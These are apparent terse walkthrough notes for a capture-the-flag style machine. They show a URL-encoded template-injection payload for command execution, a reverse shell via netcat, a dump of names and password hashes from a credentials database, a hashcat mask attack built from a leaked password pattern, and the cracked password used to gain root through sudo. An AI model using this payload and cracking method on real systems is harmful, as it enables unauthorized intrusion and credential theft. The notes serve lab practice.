SSTI vuln : %0A<%25%3d+`ls`+%25> -> replace ls with payload revshell -> netcat listen port -> rce -> got user

file : pupilpath_credentials.db < sqlite3 > at Migration
sqlite3 pupilpath_credentials.db -> 

1|Susan Miller|abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f                                                                                         
2|Tina Smith|dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57                                                                                           
3|Harry Tyler|d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393                                                                                          
4|David Lawrence|ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a                                                                                       
5|Stephen Locke|154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8 

linpeas -> /var/mail/susan

cat /var/mail/susan

Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students

in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is:

{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}

Note that all letters of the first name should be convered into lowercase. 

Please hit me with updates on the migration when you can. I am currently registering our university with the platform.

- Tina, your delightful student

hashcat -m 1400 -a 3 hash.txt susan_nasus_?d?d?d?d?d?d?d?d?d -> got password can run sudo with susan (susan_nasus_41375920) -> sudo -l -> easy got root 
